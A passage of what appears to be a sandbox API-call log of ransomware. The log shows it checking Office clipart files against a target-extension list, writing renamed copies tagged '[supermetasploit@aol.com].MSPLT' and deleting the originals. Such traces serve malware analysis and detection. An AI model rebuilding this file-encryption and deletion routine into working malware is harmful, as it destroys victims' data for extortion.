(lpString=".7z") returned 3 [0185.395] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0185.395] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 68 [0185.395] lstrlenW (lpString=".dbf") returned 4 [0185.396] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0185.396] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 68 [0185.396] lstrlenW (lpString=".1cd") returned 4 [0185.396] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0185.396] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 68 [0185.396] lstrlenW (lpString=".jpg") returned 4 [0185.396] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0185.396] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 68 [0185.396] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 68 [0185.396] lstrlenW (lpString=".doc") returned 4 [0185.396] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0185.396] lstrlenW (lpString=".docx") returned 5 [0185.396] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0185.396] lstrlenW (lpString=".pdf") returned 4 [0185.396] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0185.396] lstrlenW (lpString=".xls") returned 4 [0185.396] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0185.396] lstrlenW (lpString=".xlsx") returned 5 [0185.396] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0185.396] lstrlenW (lpString=".ppt") returned 4 [0185.396] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0185.396] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 68 [0185.396] lstrlenW (lpString=".zip") returned 4 [0185.396] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0185.396] lstrlenW (lpString=".rar") returned 4 [0185.396] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0185.397] lstrlenW (lpString=".bz2") returned 4 [0185.397] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0185.397] lstrlenW (lpString=".7z") returned 3 [0185.397] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0185.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 68 [0185.397] lstrlenW (lpString=".dbf") returned 4 [0185.397] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0185.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 68 [0185.397] lstrlenW (lpString=".1cd") returned 4 [0185.397] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0185.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 68 [0185.397] lstrlenW (lpString=".jpg") returned 4 [0185.397] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0185.397] lstrcmpiW (lpString1=".GIF", lpString2=".MSPLT") returned -1 [0185.397] lstrlenW (lpString="AG00092_.GIF") returned 12 [0185.397] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00092_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0185.410] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x25eff14 | out: lpFileSize=0x25eff14*=502) returned 1 [0185.410] CloseHandle (hObject=0x378) returned 1 [0185.410] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00092_.gif")) returned 0x220 [0185.410] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00092_.gif.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0185.410] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00092_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0185.411] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0185.411] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0185.411] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00092_.gif.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0185.411] GetLastError () returned 0x0 [0185.411] ReadFile (in: hFile=0x378, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x1f6, lpOverlapped=0x0) returned 1 [0185.413] WriteFile (in: hFile=0x354, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0x200, lpOverlapped=0x0) returned 1 [0185.414] ReadFile (in: hFile=0x378, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x0, lpOverlapped=0x0) returned 1 [0185.415] WriteFile (in: hFile=0x354, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0xec, lpOverlapped=0x0) returned 1 [0185.416] SetEndOfFile (hFile=0x354) returned 1 [0185.416] CloseHandle (hObject=0x354) returned 1 [0185.421] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0185.421] SetEndOfFile (hFile=0x378) returned 1 [0185.422] CloseHandle (hObject=0x378) returned 1 [0185.422] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0185.423] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00092_.gif")) returned 1 [0185.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 68 [0185.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 68 [0185.423] lstrlenW (lpString=".doc") returned 4 [0185.423] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0185.423] lstrlenW (lpString=".docx") returned 5 [0185.423] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0185.423] lstrlenW (lpString=".pdf") returned 4 [0185.423] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0185.423] lstrlenW (lpString=".xls") returned 4 [0185.423] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0185.423] lstrlenW (lpString=".xlsx") returned 5 [0185.423] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0185.423] lstrlenW (lpString=".ppt") returned 4 [0185.423] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0185.424] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 68 [0185.424] lstrlenW (lpString=".zip") returned 4 [0185.424] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0185.424] lstrlenW (lpString=".rar") returned 4 [0185.424] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0185.424] lstrlenW (lpString=".bz2") returned 4 [0185.424] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0185.424] lstrlenW (lpString=".7z") returned 3 [0185.424] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0185.424] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 68 [0185.424] lstrlenW (lpString=".dbf") returned 4 [0185.424] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0185.424] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 68 [0185.424] lstrlenW (lpString=".1cd") returned 4 [0185.424] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0185.424] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 68 [0185.424] lstrlenW (lpString=".jpg") returned 4 [0185.424] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0185.424] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 68 [0185.424] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 68 [0185.424] lstrlenW (lpString=".doc") returned 4 [0185.424] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0185.424] lstrlenW (lpString=".docx") returned 5 [0185.424] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0185.424] lstrlenW (lpString=".pdf") returned 4 [0185.424] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0185.425] lstrlenW (lpString=".xls") returned 4 [0185.425] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0185.425] lstrlenW (lpString=".xlsx") returned 5 [0185.425] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0185.425] lstrlenW (lpString=".ppt") returned 4 [0185.425] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0185.425] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 68 [0185.425] lstrlenW (lpString=".zip") returned 4 [0185.425] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0185.425] lstrlenW (lpString=".rar") returned 4 [0185.425] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0185.425] lstrlenW (lpString=".bz2") returned 4 [0185.425] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0185.425] lstrlenW (lpString=".7z") returned 3 [0185.425] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0185.425] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 68 [0185.425] lstrlenW (lpString=".dbf") returned 4 [0185.425] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0185.425] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 68 [0185.425] lstrlenW (lpString=".1cd") returned 4 [0185.425] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0185.425] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 68 [0185.425] lstrlenW (lpString=".jpg") returned 4 [0185.425] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0185.426] lstrcmpiW (lpString1=".GIF", lpString2=".MSPLT") returned -1 [0185.426] lstrlenW (lpString="AG00103_.GIF") returned 12 [0185.426] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00103_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0185.426] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x25eff14 | out: lpFileSize=0x25eff14*=12702) returned 1 [0185.426] CloseHandle (hObject=0x378) returned 1 [0185.426] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00103_.gif")) returned 0x220 [0185.426] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00103_.gif.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0185.427] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00103_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0185.427] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0185.427] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0185.427] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00103_.gif.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0185.427] GetLastError () returned 0x0 [0185.427] ReadFile (in: hFile=0x378, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x319e, lpOverlapped=0x0) returned 1 [0185.834] WriteFile (in: hFile=0x354, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0x31a0, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0x31a0, lpOverlapped=0x0) returned 1 [0185.835] ReadFile (in: hFile=0x378, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x0, lpOverlapped=0x0) returned 1 [0185.836] WriteFile (in: hFile=0x354, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0xec, lpOverlapped=0x0) returned 1 [0185.836] SetEndOfFile (hFile=0x354) returned 1 [0185.836] CloseHandle (hObject=0x354) returned 1 [0185.838] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0185.838] SetEndOfFile (hFile=0x378) returned 1 [0185.839] CloseHandle (hObject=0x378) returned 1 [0185.839] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0185.840] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00103_.gif")) returned 1 [0186.197] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 68 [0186.197] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 68 [0186.197] lstrlenW (lpString=".doc") returned 4 [0186.197] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0186.197] lstrlenW (lpString=".docx") returned 5 [0186.197] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0186.197] lstrlenW (lpString=".pdf") returned 4 [0186.197] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0186.197] lstrlenW (lpString=".xls") returned 4 [0186.197] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0186.197] lstrlenW (lpString=".xlsx") returned 5 [0186.197] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0186.197] lstrlenW (lpString=".ppt") returned 4 [0186.197] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0186.197] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 68 [0186.197] lstrlenW (lpString=".zip") returned 4 [0186.197] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0186.197] lstrlenW (lpString=".rar") returned 4 [0186.197] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0186.197] lstrlenW (lpString=".bz2") returned 4 [0186.197] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0186.197] lstrlenW (lpString=".7z") returned 3 [0186.197] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0186.197] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 68 [0186.198] lstrlenW (lpString=".dbf") returned 4 [0186.198] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0186.198] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 68 [0186.198] lstrlenW (lpString=".1cd") returned 4 [0186.198] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0186.198] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 68 [0186.198] lstrlenW (lpString=".jpg") returned 4 [0186.198] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0186.198] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 68 [0186.198] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 68 [0186.198] lstrlenW (lpString=".doc") returned 4 [0186.198] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0186.198] lstrlenW (lpString=".docx") returned 5 [0186.198] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0186.198] lstrlenW (lpString=".pdf") returned 4 [0186.198] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0186.198] lstrlenW (lpString=".xls") returned 4 [0186.198] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0186.198] lstrlenW (lpString=".xlsx") returned 5 [0186.198] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0186.198] lstrlenW (lpString=".ppt") returned 4 [0186.198] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0186.198] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 68 [0186.198] lstrlenW (lpString=".zip") returned 4 [0186.198] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0186.198] lstrlenW (lpString=".rar") returned 4 [0186.198] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0186.198] lstrlenW (lpString=".bz2") returned 4 [0186.199] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0186.199] lstrlenW (lpString=".7z") returned 3 [0186.199] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0186.199] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 68 [0186.199] lstrlenW (lpString=".dbf") returned 4 [0186.199] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0186.199] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 68 [0186.199] lstrlenW (lpString=".1cd") returned 4 [0186.199] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0186.199] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 68 [0186.199] lstrlenW (lpString=".jpg") returned 4 [0186.199] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0186.199] lstrcmpiW (lpString1=".GIF", lpString2=".MSPLT") returned -1 [0186.199] lstrlenW (lpString="AG00139_.GIF") returned 12 [0186.199] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00139_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0186.200] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x25eff14 | out: lpFileSize=0x25eff14*=10607) returned 1 [0186.200] CloseHandle (hObject=0x38c) returned 1 [0186.200] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00139_.gif")) returned 0x220 [0186.200] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00139_.gif.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0186.200] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00139_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0186.200] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0186.200] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0186.200] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00139_.gif.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0186.201] GetLastError () returned 0x0 [0186.201] ReadFile (in: hFile=0x38c, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x296f, lpOverlapped=0x0) returned 1 [0186.238] WriteFile (in: hFile=0x36c, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0x2970, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0x2970, lpOverlapped=0x0) returned 1 [0186.239] ReadFile (in: hFile=0x38c, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x0, lpOverlapped=0x0) returned 1 [0186.239] WriteFile (in: hFile=0x36c, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0xec, lpOverlapped=0x0) returned 1 [0186.240] SetEndOfFile (hFile=0x36c) returned 1 [0186.240] CloseHandle (hObject=0x36c) returned 1 [0186.244] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0186.244] SetEndOfFile (hFile=0x38c) returned 1 [0186.245] CloseHandle (hObject=0x38c) returned 1 [0186.245] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0186.246] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00139_.gif")) returned 1 [0186.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 68 [0186.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 68 [0186.246] lstrlenW (lpString=".doc") returned 4 [0186.246] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0186.246] lstrlenW (lpString=".docx") returned 5 [0186.246] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0186.246] lstrlenW (lpString=".pdf") returned 4 [0186.246] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0186.246] lstrlenW (lpString=".xls") returned 4 [0186.246] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0186.246] lstrlenW (lpString=".xlsx") returned 5 [0186.246] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0186.247] lstrlenW (lpString=".ppt") returned 4 [0186.247] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0186.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 68 [0186.247] lstrlenW (lpString=".zip") returned 4 [0186.247] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0186.247] lstrlenW (lpString=".rar") returned 4 [0186.247] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0186.247] lstrlenW (lpString=".bz2") returned 4 [0186.247] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0186.247] lstrlenW (lpString=".7z") returned 3 [0186.247] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0186.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 68 [0186.247] lstrlenW (lpString=".dbf") returned 4 [0186.247] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0186.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 68 [0186.247] lstrlenW (lpString=".1cd") returned 4 [0186.247] lstrcmpiW 